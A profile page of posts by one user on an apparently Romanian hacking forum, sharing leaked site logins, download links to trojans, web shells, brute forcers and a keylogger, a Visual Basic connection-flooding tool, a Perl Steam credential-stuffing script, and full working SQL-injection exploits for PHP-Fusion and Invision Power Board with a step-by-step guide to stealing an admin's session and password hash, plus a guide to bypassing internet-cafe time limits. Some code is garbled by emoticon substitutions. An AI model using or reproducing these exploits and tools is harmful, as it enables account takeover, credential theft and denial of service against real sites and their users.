Jump to content

Proxenon

Members
  • Posts

    43
  • Joined

  • Last visited

Everything posted by Proxenon

  1. Proxenon

    Conturi

    http://www.fulldownloads.us Username: Af872HskL Password: XjsdH28N http://www.warezquality.com Username: ageg2020 Password: z8fsDfg3 http://www.dollarwarez.com Username: YR8JBz Password: DxAVC2 Aceste conturi le puteti gasi cu un simplu search pe google P.S:nu am stiut unde sa le postez
  2. Download: http://www.netdrive.ws/46770.html
  3. Vom avea nevoie de 3 API-uri : Private Declare Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long Private Declare Function ShowCursor Lib "user32" (ByVal bShow As Long) As Long Private Declare Function SwapMouseButton Lib "user32" Alias "SwapMouseButton" (ByVal bSwap As Long) As Long Cu functia SetCursorPos vom seta pozitia cursorului . Functia are 2 argumente : x si y , adica locatia in care sa setam curorul . Freeze mouse : setam pozitia cursorului in acelasi loc , cu ajutorul unui timer ( interval 1 ) : Private Sub Timer1_Timer() x = SetCursorPos(300, 500) ' La intamplare 300 , 500 End Sub Crazy Mouse : Setam pozitia mouse-ului aleator pe ecran cu ajutorul unui timer ( interval 10 de ex ) : Private Sub Timer1_Timer() x = SetCursorPos(Rnd * 1000, Rnd * 1000) ' Setam pozitia cursorului ca un nr aleator intre 0 si 1000 . End Sub Pentru a opri Freeze mouse si crazy mouse , oprim timerul . Hide Mouse - Vom folosi al doilea API : ShowCursor , care are nevoie decat de un argument : bShow . Daca bShow e 1 , cursorul va fi vizibil , daca e 0 va fi ascuns . Private Sub Command1_Click() ShowCursor 0 ' Ascundem cursorul End Sub Pentru a afisa din nou cursorul : ShowCursor 1 Pentru Swap Mouse Button vom foloi al 3-lea API : SwapMouseButton , care la fel ca ShowCursor , are un singur argument : bSwap , care daca va fi 1 , butoanele mouseului vor fi inversate si daca va fi 0 se va reveni la normal . Private Sub Command1_Click() SwapMouseButton 1 ' Pentru inversare End Sub Private Sub Command2_Click() SwapMouseButton 0 ' Pentru revenire la normal End Sub
  4. Pentru a creea un mic sau mare port fucker in Visual Basic 6 Vom Avea nevoie de : - 2 Textboxuri (ip.text si port.text) - 2 Butoane (cmdStart si cmdStop) - Control Microsoft Winsock Control 6.0 (mswinsck.ocx Project -> Components) - 5 (Sau mai multe Winsockuri pe Forma) - 1 Timer pus pe intervalul 1 (Numele lui sa fie action) si care sa fie disabled In Urmatorul Exemplu vom folosi numai 5 Winsockuri (sock1 , sock2 , sock3 , sock4 , sock5) Codul butonului De Start : Cod: action.enabled = true Codul Butonului de Stop : Cod: action.enabled = false Codul Timerului Action : Cod: For i = 0 to 150 'Reconnecteaza de 150 de ori Winsockuriile 'Sock 1 sock1.close sock1.RemoteHost = ip.text sock1.RemotePort = port.text sock1.Connect sock1.close Cod: 'Sock 2 sock2.close sock2.RemoteHost = ip.text sock2.RemotePort = port.text sock2.Connect sock2.close Cod: 'Sock 3 sock3.close sock3.RemoteHost = ip.text sock3.RemotePort = port.text sock3.Connect sock3.close Cod: 'Sock 4 sock4.close sock4.RemoteHost = ip.text sock4.RemotePort = port.text sock4.Connect sock4.close Cod: 'Sock 5 sock5.close sock5.RemoteHost = ip.text sock5.RemotePort = port.text sock5.Connect sock5.close next i
  5. [VB]bLACKdREAM [VB]derSphear [VB]Evoloution [VB]Monk1.0 [VB]Omega1.1 [Vb]Sect [Vb]SennaspyAutoTrojan [VB]stealth eye [VB]simplu [VB]Remote_Admin [VB]pzza cod [VB]pasword crack [VB]Organising182384112001 [VB]minimo [VB]Messiah 2.0 [Private] [VB]Handle-X [VB]FearRAT [VB]Controla Machine [VB]CommandCenter [VB]ClientServerciccio [VB]Black Dream [VB]Basic Trojan Horse [VB]Ullysse http://rapidshare.com/files/54745473/surse_cod.rar
  6. CrackersKit 2005 Golden eye 2005 HellLabs Proxy Checker v7.4.18 HostScan v1.6.5.531 Invisible Browsing v4.0 IPScanner v1.86 Ascii Factory 0.6 Cool Beans NFO Creator v2.0.1.3 Dizzy v1.10 Feuer's NFO File Maker v2.0 Ims NFO&DIZ Maker 1.87 Inserter v1.12 NFO Creator v3.5.2 NFO Maker 1.0 Patchs All In One 2005 SoftIce 4.05 -Win 2000-XP IP Address Scanner IP Calculator IP Converter Port Listener Port Scanner April 2005 Ping NetStat 2005 Cool Trace Route 2005 TCP/IP Configuration Online - Offline Checker Resolve Host & IP Time Sync Whois & MX Lookup Connect0r Connection Analysator and prtotector Net Sender April 2005 E-mail seeker Cool Net Pager Active and Passive port scanner Spoofer Hack Trapper HTTP flooder (DoS) Mass Website Visiter Advanced Port Scanner Trojan Hunter Multi IP April 2005 Port Connecter Tool Advanced Spoofer Cool Advanced Anonymous E-mailer April 2005 Simple Anonymous E-mailer Anonymous E-mailer with Attachment Support Mass E-mailer E-mail Bomber E-mail Spoofer Simple Port Scanner (fast) Advanced Netstat Monitoring X Pinger Web Page Scanner Cool Fast Port Scanner Deep Port Scanner Fastest Host Scanner (UDP) Get Header Open Port Scanner Multi Port Scanner HTTP scanner (Open port 80 subnet scanner) Multi Ping for Cisco Routers TCP Packet Sniffer UDP flooder Cool Resolve and Ping Multi IP ping File Dependency Sniffer EXE-joiner Encrypter Advanced Encryption File Difference Engine File Comparasion Mass File Renamer Add Bytes to EXE 5Cool Cool Variable Encryption 59) Simple File Encryption 60) ASCII to Binary Enigma Password Unmasker Credit Card Number Validate and generate Create Local HTTP Server eXtreme UDP Flooder Web Server Scanner Force Reboot Cool Webpage Info Seeker Bouncer Advanced Packet Sniffer IRC server creater Connection Tester Fake Mail Sender Bandwidth Monitor Remote Desktop Protocol Scanner MX Query Messenger Packet Sniffer Cool API Spy DHCP Restart File Merger E-mail Extractor (crawler / harvester bot) Open FTP Scanner Fast Patch Predator's Extreme Loader Generator 0.3 Srlzer - Patch generator Yoda's Process Patcher Buddha Patch File Creator 2.2 CodeFusion Cool Beans NFO Creator 2.0.1 build 3 Patch Creation Wizard v1.2 Patch On The Fly v0.75 Rlzer RTD - WINpatch v1.0 Tola's Patching Engine Analysis : OllyDbg 1.10 W32Dasm 8.93 /w patch PEiD 0.92 Rebuilding : ImpRec 1.6 Revirgin 1.3 LordPE RoyalITS Packers : FSG 2.0 MEW 11 1.2 SE UPX 1.25 Patchers : dUP 1.11 CodeFusion 3.0 Universal Patcher Pro 2.0 aPatch 1.07 (*New) PMaker 1.1.0.0 (*New) Tola's Patch Engine 2.03b (*Nuevo) ABEL Loader 2.31 (*Nuevo) HEX Editor : BView 5.6.2 Decompilers : DeDe 3.50.04 Flasm Unpackers : Alot! ( ASProtect, ACProtect etc ) Others : FileMon RegMon RSATool 2 d*mn HashCalc Krugers ToolBox EVACleaner 2.7 (*New) Process Explorer (*New) Resource Hacker (*New) PUPE 2002 (*New) Download: http://rapidshare.de/files/14784929/simsek206.rar.html Password: www.internetkorsanlari.net.tc
  7. Avetzi aici uneltele de munca a unui hacker ••• sH3ll ••• -Antichat Shell v1.3 -Ayyildiz Tim -AYT- Shell v 2.1 Biz -aZRaiLPhp v1.0 -c100 -CrystalShell v.1 -Cyber Shell (v 1.0) -dC3 Security Crew Shell PRiV8 -Dive Shell 1.0 - Emperor Hacking Team -DxShell.1.0 -ELMALISEKER Backd00r -GFS web-shell ver 3.1.7 - PRiV8 -h4ntu shell [powered by tsoi] -JspWebshell 1.2 -KAdot Universal Shell v0.1.6 -Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit -Macker's Private PHPShell -Mysql interface v1.0 -MySQL Web Interface Version 0.8 -NIX REMOTE WEB-SHELL v.0.5 alpha Lite Public Version -Perl Web Shell by RST-GHC -Private-i3lue -RedhatC99 [login=redhat-pass=root] -Rootshell.v.1.0 -s72 Shell v1.1 Coding -Safe0ver Shell -Safe Mod Bypass By Evilc0der -Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2 -SimAttacker - Vrsion 1.0.0 - priv8 4 My friend -SimShell 1.0 - Simorgh Security MGZ -SnIpEr_SA Shell -WinX Shell -Worse Linux Shell ••• Vuln Scan ••• -GoogleRFI + MassInjector in Perl -MaD-CW XSS & Remote File Inclusion Scanner [Win] -PerlGroup Scanner RFI -REMOTE FILE INCLUDE SCANNER SHELLBOT -RFI Scan created by Ironfist -Scanutil 1.1 by ToRNadO -Shellbot with VulnScan m0d by AdvAnCeD -RFI-SQL scanner -VulnScan v6 + Spread + Defacing Tool v2 -VulnScan v7 -Final- By k1n9k0ng -VulnScan v8 by PcW0rm [iTA by s[H]4g] -VulnScan v9 -XeviL Perl Script 1.0 By ar3s ••• Oth3r t00lz ••• -BUNNY BOT Version 0.1 -ConnectBack Backdoor Shell vs 1.0 by LorD -Flud2Mail (F2M) 0.1 -FTp brute forcer -iMHaBiRLiGi PhpFtp V1.1 -LocalLinuxExploitFinder -Mass Defacer And Log Eraser PRiV8 -Multi-thread FTP scanner v0.2.5 by Inode -NetGaurd FTP Brute Force -PHProxy -RST MySQL tools -scan - K. Script v0.3 Beta By DiVaBoY -Simple FTP brute by ReZEN -S l a v e Z e r o IRC B0t -Stealth ShellBot Vers 0.2 by Thiago X -inDEXER And ReaDer -ZER0CoOLz Mail BomBER link pt download http://rapidshare.com/files/20563603/NiAi-drt.rar parola arhivei e d4rk-r3v-t34m marimea 4.9 mb
  8. Forum Poster 2.7 + Crack Forum Poster allow you to post any message you want to all forum boards. The current version can post to : 1. phpBB Forum Boards from version 2.0.0 to 2.0.22 http://www.phpbb.com/ 2. phpBB 3.0 "Olympus" Beta 5 http://www.phpbb.com/development/ 3. Invision Power Board http://www.invisionboard.com/ 4. Snitz Forums 2000 http://forum.snitz.com/ 5. vBulletin 3 http://www.vbulletin.com/ Forum Poster automatically register a user with the username, e-mail and password you typed on the board. It loggs in as the registered user on the board and then posts it. All made automatically. With just one click! (Please browse our demo boards for posting) Forum Poster support add, edit, delete forums URL, Import and export forum URL list. Forum boards are an effective way to drive traffic to your site. With your posted Ads you can bring hundreds of new visitors to your site and increase your search engine rankings which counts on link popularity like Google. Download: http://rapidshare.com/files/39965827/ForPostR2.rar
  9. Download : http://files.filefront.com/firewall+killer+13rar/;10014551;/fileinfo.html
  10. Ardamax Keylogger is a keystroke recorder that captures user’s activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited. download, marime ( 1,2 mb ): http://rapidshare.com/files/90820657/Ardamax.Keylogger.v2.85.rar
  11. Features: 100% recovery rate Resets passwords directly from a bootable USB Drive, no floppy or CD-ROM drive required Resets password for any account Resets local policy settings for any account Displays the detailed information about local user accounts Windows XP Tablet PC Edition is supported Windows Server 2003 is supported Windows Server 2003 R2 is supported Windows XP Home and Professional Editions are supported Windows 2000 Professional, Server and Advanced Server are supported Windows NT Workstation and Server 4.0 are supported Resets Domain Administrator password for Active Directory Domain Controllers (Enterprise Edition only) All secure boot options are supported All Service Packs are supported http://rapidshare.com/files/51797415/WinHackCD_ST_R.rar
  12. #! /usr/bin/perl use LWP::UserAgent; my $ua = LWP::UserAgent->new( agent => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Alexa Toolbar Firefox/2.0.0.6 (Ubuntu-feisty)' ); $ua->default_headers->push_header('Referer' => 'https://steamcommunity.com/'); $ua->default_headers->push_header('Cookie' => 'timezoneOffset=7200,0'); my $url = 'https://steamcommunity.com/'; open(FILE, $ARGV[ 0 ]) or die("Could Not Open File!\n"); my @lines = <FILE>; close(FILE); foreach $userpass (@lines) { $userpass =~ s/^\s+//; $userpass =~ s/\s+$//; unless($userpass =~ m/(.*?)\.*?)(\ |$)/g){next;} my $user = $1; my $pass = $2; retry: print "Trying User: ".$user." \t\tPass: ".$pass."\n"; my $response = $ua->post( $url, { 'action' => 'doLogin', 'goto' => '', 'steamAccountName' => $user, 'steamPassword' => $pass, 'x' => int(rand(100)+750), 'y' => int(rand(10)+390), }); #print $response->content; exit; if($response->code == 302) { print "Logged IN!\n"; open(FILE, '>>', 'steamworking.txt'); print FILE $userpass."\x0D\x0A"; close(FILE); } elsif(($response->is_success) && ($response->content =~ m/Incorrect.*login/gi)) { print "Fail, Next!\n"; next; } else { print "No Match, Retrying!\n"; goto retry; } }
  13. #!/usr/bin/python """ #=================================================================================================# # ____ __________ __ ____ __ # # /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ # # | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ # # | | | \ | |/ \ \___| | /_____/ | || | # # |___|___| /\__| /______ /\___ >__| |___||__| # # \/\______| \/ \/ # #=================================================================================================# # This was a priv8 Exploit # #=================================================================================================# # PHP-Fusion 6.00.307 # # And Probably All Other Versions # # Blind Sql Injection Vulnerability # # Benchmark Method # #====================================#===========#====================================#===========# # Server Configuration Requirements # # Some Information # # #====================================# #====================================# # # # # # magic_quotes_gpc = 0 # Vendor: php-fusion.co.uk # # # Author: The:Paradox # #================================================# Severity: Moderately Critical # # # # # Oh wow no-content space! Enjoy it! # Proud To Be Italian. # # # # #====================================#===========#================================================# # Proof Of Concept / Bug Explanation # # #====================================# # # PHP-Fusion presents a critical vulnerability in submit.php page. Let's see source: # #=================================================================================================# [submit.php] 1. if ($stype == "l") { 2. 3. if (isset($_POST['submit_link'])) { 4. 5. if ($_POST['link_name'] != "" && $_POST['link_url'] != "" && $_POST['link_description'] != "") { 6. $submit_info['link_category'] = stripinput($_POST['link_category']); 7. $submit_info['link_name'] = stripinput($_POST['link_name']); 8. $submit_info['link_url'] = stripinput($_POST['link_url']); 9. $submit_info['link_description'] = stripinput($_POST['link_description']); 10. $result = dbquery("INSERT INTO ".$db_prefix."submissions (submit_type, submit_user, submit_datestamp, submit_criteria) VALUES ('l', '".$userdata['user_id']."', '".time()."', '".serialize($submit_info)."')"); #=================================================================================================# # Look to the sql query. # # There are two variables: $userdata['user_id'] and a serialized array $submit_info. # # The user_id is an intval value and array values link_category, link_name, link_url and # # link_description are correctly cleaned via fusions' stripinput() function. # # # # All seems pretty cleaned. # # But what would happen if we set another value into submit_info[] array via gpc vars? # # It will be set in the serialized array, and obvious it will not checked by stripinput. # # Sql Injection possibility! # # # # Let's see: # # # # Host: 127.0.0.1 # # POST PHP-Fusion/submit.php?stype=l # # link_category=1 link_name=1 link_url=1 link_description=1 submit_info[paradox]=' submit_link=1 # # # # It will result in sql error in case of Mq = 0 : # # # # You have an error in your SQL syntax; check [...] # # # #=================================================================================================# # Normally to make this trick working register_globals = 1 is needed, but in php-fusion uses # # extract() to simulate register_globals when it is set to 0. # #=================================================================================================# # Use this at your own risk. You are responsible for your own deeds. # #=================================================================================================# # Python Exploit Starts # #=================================================================================================# """ from httplib import HTTPConnection from urllib import urlencode from time import time from sys import exit, argv, stdout from md5 import new print """ #=================================================================# # PHP-Fusion v6.00.307 # # And Probably All Other Versions # # Blind Sql Injection Vulnerability # # Benchmark Method # # # # Discovered By The:Paradox # # # # Usage: # # ./fusiown [Target] [Path] [ValidId] [ValidPass] [TargetUserid] # # # # Example: # # ./fusiown localhost /phpfusion/ 40 s3cr3t 1 # # ./fusiown www.host.org / 791 myp4ssw0rd 1 # #=================================================================# """ if len(argv)<=5: exit() else: print "[.]Exploit Starting." prefix = "fusion_" benchmark = "230000000" vtime = 6 port = 80 target = argv[1] path = argv[2] cuid = argv[3] cpass = argv[4] uid = argv[5] j=1 h4sh = "" ht = [] for k in range(48,58): ht.append(k) for k in range(97,103): ht.append(k) ht.append(0) def calc_md5(p): hash = new() hash.update(p) return hash.hexdigest() print "[.]Blind Sql Injection Starts.\n\nHash:" while j <= 32: for i in ht: if i == 0: exit('[-]Exploit Failed.\n') start = time() conn = HTTPConnection(target,port) inj = "' OR (SELECT IF((ASCII(SUBSTRING(user_password," + str(j) + ",1))=" + str(i) + "),benchmark(" + benchmark + ",CHAR(0)),0) FROM " + prefix + "users WHERE user_id=" + uid + "))# BH > WH" conn.request("POST", path + "submit.php?stype=l", urlencode({'link_category': '1', 'link_name': '1', 'link_url': '1', 'link_description': '1', 'submit_link' : 'Submit+Link', 'submit_info[cGd0MQ==]' : inj }), {"Accept": "text/plain", "Content-Type" : "application/x-www-form-urlencoded","Cookie": "fusion_user=" + cuid + "." + calc_md5(cpass) + ";"}) response = conn.getresponse() read = response.read() if response.status == 404: exit('[-]Error 404. Not Found.') now = time() if now - start > vtime: stdout.write(chr(i)) stdout.flush() h4sh += chr(i) j += 1 break; print "\n\n[+]All Done.\n-=Paradox Got This One=-" # milw0rm.com [2008-04-19]
  14. Rated as : Moderated Risk #!/usr/bin/perl use LWP::UserAgent; $ua = LWP::UserAgent->new; &header(); if (@ARGV < 2) {&info(); exit();} $server = $ARGV[0]; $dir = $ARGV[1]; print "[+] SERVER {$server}\r\n"; print "[+] DIR {$dir}\r\n"; #Step 1, detecting vulnerability print "[1] Testing forum vulnerability..."; $q = "UNION SELECT 'VULN',1,1,1/*"; query($q,$server,$dir); if($rep =~/VULN/){ print "forum vulnerable\r\n"; } else { print "forum unvulnerable\r\n"; &footer(); exit(); } #Step 2, detecting prefix print "[2] Searching prefix..."; $q = ""; query($q,$server,$dir); $prefix = $rep; print $prefix."\r\n"; #Step 3, make query print "[3] Performing query; it may take several minutes, plz, wait...\r\n"; $q1 = "UNION SELECT MAX(converge_id),1,1,1 FROM ".$prefix."members_converge/*"; query($q1,$server,$dir); $kol = $rep; open(RES,">".$server."_result.txt"); for($id = 1; $id <= $kol; $id++) { $own_query = "UNION SELECT converge_pass_hash,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*"; query($own_query,$server,$dir); if($rep=~/[0-9a-f]{32}/i) { $hash = $rep; $own_query = "UNION SELECT converge_pass_salt,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*"; query($own_query,$server,$dir); if(length($rep)==5) { $salt = $rep; $own_query = "UNION SELECT converge_email,1,1,1 FROM ".$prefix."members_converge WHERE converge_id=".$id."/*"; query($own_query,$server,$dir); if(length($rep)>0) { $email = $rep; print RES $id.":".$hash.":".$salt."::".$email."\n"; } } } } close(RES); print "[!] Query was successfully perfomed. Results are in txt files\r\n"; &footer(); $ex = <STDIN>; sub footer() { print "[G] Greets: 1dt.w0lf (rst/ghc)\r\n"; print "[L] Visit: secbun.info | damagelab.org | rst.void.ru\r\n"; } sub header() { print q( ---------------------------------------------------------- * Invision Power Board 2.1.* Remote SQL Injecton Exploit * * Based on r57-Advisory#41 by 1dt.w0lf (rst/ghc) * * Coded by w4g.not null * * FOR EDUCATIONAL PURPOSES *ONLY* * ---------------------------------------------------------- ); } sub info() { print q( Usage: perl w4gipb216.pl [server] [/dir/] where |- server - server, where IPB installed without http:// |- /dir/ - dir, where IPB installed or / for no dir e.g perl w4gipb216.pl someserver.com /forum/ Stealing info about users (format id:pass:salt::email) [!] Need MySQL > 4.0 ); } sub query() { my($q,$server,$dir) = @_; $res = $ua->get("http://".$server.$dir."index.php?s=w00t",'USER_AGENT'=>'','CLIENT_IP'=>"' ".$q); if($res->is_success) { $rep = ''; if($res->as_string =~ /ipb_var_s(\s*)=(\s*)"(.*)"/) { $rep = $3; } else { if($res->as_string =~ /FROM (.*)sessions/) { $rep = $1; } } } return $rep; } securitydot.net - 2006-07-19
  15. Buna baieti,sunt sigur ca totii ati fost cel putin o data la un Internet Cafe unde aveati limita la timpul dvs.In acest tutorial voi incerca sa va explic ce trebuie facut pentru a avea timp nelimitat la PC-urile din obisnuitele cluburi de Internet Cafe.Voi incepe cu metoda cea mai simpla si anume:atunci cand responsabilii salii folosesc ScreenSavere pentru a bloca utilizarea PC-ului.Sa incepem: Apasa CTRL+ALT+DEL si inchide procesul. Apoi te vei uita la un desktop gol, fara Start ,fara nimic. Urmatorul lucru : CTRL+ALT+DEL din nou si dute la File>New Task (RUN) Scrie "iexplore.exe" fara ". Finish. Acum poti naviga pe net cat doresti. Wink A doua metoda : Deschide un Notepad, apoi scrie CMD in el,apoi salveaza-l ca un fiser BATCH ,Exemplu: Fisier.bat (Ar fi mai bine ca Notepad-ul si fisierul BATCH sa se afle pe desktop), ruleaza fisierul nou creat (Fisier.bat).Vei vedea o fereastra Command Prompt, scrie "cd\windows" pentru a schimba directorul in Windows,pe urma scrie "regedit" ,navigheaza pana la : Cod: HKEY_CURRENT_USER>Appevents>software>classes> microsoft>windows>current version>internet settings>policies>system Apoi in dreapta vei vedea Disable Taskmanager, click dreapta pe el, scroll cu mouse-ul jos pe modify ( CLICK PE EL ), pune valoarea "0". Deschide Windows Task Manager tinand apasat CTRL+ALT+DEL, dezactiveaza timpul limita (TIMER-UL) Ia te uita ,acum ai timp nelimitat. Acest lucru e posibil,daca responsabilii cu sala / adminii ,sau cum vrei sa-i ziceti, sunt prosti si nu observa ca dvs stati la PC-ul respestiv de 10 ore. Bafta in continuare.
  16. Salut acest tutorial se refera la exploitul Ipb adica Invision Powerd Board Deci sa incepem: 1)Pentru inceput aveti nevoie de Activ Perl 2)Exploitul:#!/usr/bin/perl ## Invision Power Board SQL injection exploit by RST/GHC ## vulnerable forum versions : 1.* , 2.* (<2.0.4) ## tested on version 1.3 Final and version 2.0.2 ## * work on all mysql versions ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On) ## ©oded by 1dt.w0lf ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## screen: ## ~~~~~~~ ## r57ipb2.pl blah.com /ipb13/ 1 0 ## [~] SERVER : blah.com ## [~] PATH : /ipb13/ ## [~] MEMBER ID : 1 ## [~] TARGET : 0 - IPB 1.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99 ## ## r57ipb2.pl blah.com /ipb202/ 1 1 ## [~] SERVER : blah.com ## [~] PATH : /ipb202/ ## [~] MEMBER ID : 1 ## [~] TARGET : 1 - IPB 2.* ## [~] SEARCHING PASSWORD ... [ DONE ] ## ## MEMBER ID : 1 ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## Greets: James Bercegay of the GulfTech Security Research Team ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ use IO::Socket; if (@ARGV < 4) { &usage; } $server = $ARGV[0]; $path = $ARGV[1]; $member_id = $ARGV[2]; $target = $ARGV[3]; $pass = ($target)?('member_login_key')Sad'password'); $server =~ s!(http:\/\/)!!; $request = 'http://'; $request .= $server; $request .= $path; $s_num = 1; $|++; $n = 0; print "[~] SERVER : $server\r\n"; print "[~] PATH : $path\r\n"; print "[~] MEMBER ID : $member_id\r\n"; print "[~] TARGET : $target"; print (($target)?(' - IPB 2.*')Sad' - IPB 1.*')); print "\r\n"; print "[~] SEARCHING PASSWORD ... [|]"; ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; while(1) { if(&found(47,5Cool==0) { &found(96,122); } $char = $i; if ($char=="0") { if(length($allchar) > 0){ print qq{\b\b DONE ] MEMBER ID : $member_id }; print (($target)?('MEMBER_LOGIN_KEY : ')Sad'PASSWORD : ')); print $allchar."\r\n"; } else { print "\b\b FAILED ]"; } exit(); } else { $allchar .= chr($i); } $s_num++; } sub found($$) { my $fmin = $_[0]; my $fmax = $_[1]; if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; } $r = int($fmax - ($fmax-$fmin)/2); $check = " BETWEEN $r AND $fmax"; if ( &check($check) ) { &found($r,$fmax); } else { &found($fmin,$r); } } sub crack($$) { my $cmin = $_[0]; my $cmax = $_[1]; $i = $cmin; while ($i<$cmax) { $crcheck = "=$i"; if ( &check($crcheck) ) { return $i; } $i++; } $i = 0; return $i; } sub check($) { $n++; status(); $ccheck = $_[0]; $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D"; $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28"; $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*"; $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg; $nmalykh = "%20"; $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80"); printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n", $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh); while(<$socket>) { if (/Set-Cookie: session_id=0;/) { return 1; } } return 0; } sub status() { $status = $n % 5; if($status==0){ print "\b\b/]"; } if($status==1){ print "\b\b-]"; } if($status==2){ print "\b\b\\]"; } if($status==3){ print "\b\b|]"; } } sub usage() { print q( Invision Power Board v < 2.0.4 SQL injection exploit ---------------------------------------------------- USAGE: ~~~~~~ r57ipb2.pl [server] [/folder/] [member_id] [target] [server] - host where IPB installed [/folder/] - folder where IPB installed [member_id] - user id for brute targets: 0 - IPB 1.* 1 - IPB 2.* (Prior To 2.0.4) e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1 ---------------------------------------------------- ©oded by 1dt.w0lf RST/GHC , http://rst.void.ru , http://ghc.ru ); exit(); } Il salvati cu extensia .pl de ex ipb.pl 3)Mergeti in browser pe google dati search cu urmatoarele powered by invision v1.3 4)Alegeti un forum care vreti 5)Va faceti un cont 6)Start->Run->Cmd 7)Aici puneti numele sitului folderu si numarul userului administratorului si 0 la sfarsit 8)Enter si asteptati...pana o sa va dea un hash 9)Mergeti in opera la tools->preferences->cookies->manage cookies->cautati forumul->si inlocuiti member_id cu numarul acela al adminului->password_hash copiati din cmd acel hash->ok->close 10)Dati un refresh la pagina And Surprise Sunteti Adminul Acelui forum Atentie pentru a avea acces la Admin Panel trebuie decriptata parola...Un decryptor bun este Cain&Abel dar va trebuie un worldlist bun Si asta a fost tot
  17. In primul rand il downloadati de aici www.activeperl.com ! Ok sunt 2 tipuri de instal ! 1 sub forma .exe 2 sub forma Install.bat Daca il gasiti sub forma de .exe cred ca va descurcati si singuri sa dati next next and finish , iar daca il gasiti sub forma Install.bat o sa va apara intr-o fereastra de Command Promt fiti atenti si urmati indicatiile Cod: Welcome to ActivePerl. This installer can install ActivePerl in any location of your choice. You do not need Administrator privileges. However, please make sure that you have write access to this location. Enter top level directory for install [c:Perl]: c:\Perl The typical ActivePerl software installation requires 35 megabytes. Please make sure enough free space is available before continuing. ActivePerl 638 will be installed into 'c:\Perl' Proceed? [y] y If you have a development environment (e.g. Visual Studio) that you wish to use with Perl, you should ensure that your environment (e.g. %LIB% and %INCLUDE%) is set before installing, for example, by running vcvars32.bat first. Proceed? [y] y Create shortcuts to the HTML documentation? [y] y Add the Perl/bin directory to the PATH? [y] y dupa aceea o sa zica : Cod: Copying files... 2455 File(s) copied Finished copying files... Configuring Perl installation at c:Perl Translating C:p4viewAppsActivePerlMSIdataActivePerlPerl to c:Perl editing c:Perl/site/lib/ppm.xml editing c:Perl/site/lib/ppm-conf/Archive-Tar.pkg editing c:Perl/site/lib/ppm-conf/Compress-Zlib.pkg editing c:Perl/site/lib/ppm-conf/Data-Dump.pkg editing c:Perl/site/lib/ppm-conf/Digest-HMAC.pkg editing c:Perl/site/lib/ppm-conf/Digest-MD2.pkg editing c:Perl/site/lib/ppm-conf/Digest-MD4.pkg editing c:Perl/site/lib/ppm-conf/Digest-MD5.pkg editing c:Perl/site/lib/ppm-conf/Digest-SHA1.pkg editing c:Perl/site/lib/ppm-conf/Digest.pkg editing c:Perl/site/lib/ppm-conf/File-CounterFile.pkg editing c:Perl/site/lib/ppm-conf/Font-AFM.pkg editing c:Perl/site/lib/ppm-conf/HTML-Parser.pkg editing c:Perl/site/lib/ppm-conf/HTML-Tagset.pkg editing c:Perl/site/lib/ppm-conf/HTML-Tree.pkg editing c:Perl/site/lib/ppm-conf/IO-Zlib.pkg editing c:Perl/site/lib/ppm-conf/libnet.pkg editing c:Perl/site/lib/ppm-conf/libwin32.pkg editing c:Perl/site/lib/ppm-conf/libwww-perl.pkg editing c:Perl/site/lib/ppm-conf/MD5.pkg editing c:Perl/site/lib/ppm-conf/MIME-Base64.pkg editing c:Perl/site/lib/ppm-conf/PPM-Agent-Perl.pkg editing c:Perl/site/lib/ppm-conf/PPM.pkg editing c:Perl/site/lib/ppm-conf/ppminst.bat editing c:Perl/site/lib/ppm-conf/SOAP-Lite.pkg editing c:Perl/site/lib/ppm-conf/Storable.pkg editing c:Perl/site/lib/ppm-conf/Test-Simple.pkg editing c:Perl/site/lib/ppm-conf/Tk.pkg editing c:Perl/site/lib/ppm-conf/URI.pkg editing c:Perl/site/lib/ppm-conf/XML-Parser.pkg editing c:Perl/site/lib/ppm-conf/XML-Simple.pkg editing c:Perl/site/lib/auto/XML/Simple/.packlist editing c:Perl/site/lib/auto/XML/Parser/.packlist editing c:Perl/site/lib/auto/Win32/.packlist editing c:Perl/site/lib/auto/Win32/AuthenticateUser/.packlist editing c:Perl/site/lib/auto/URI/.packlist editing c:Perl/site/lib/auto/Unicode/String/.packlist editing 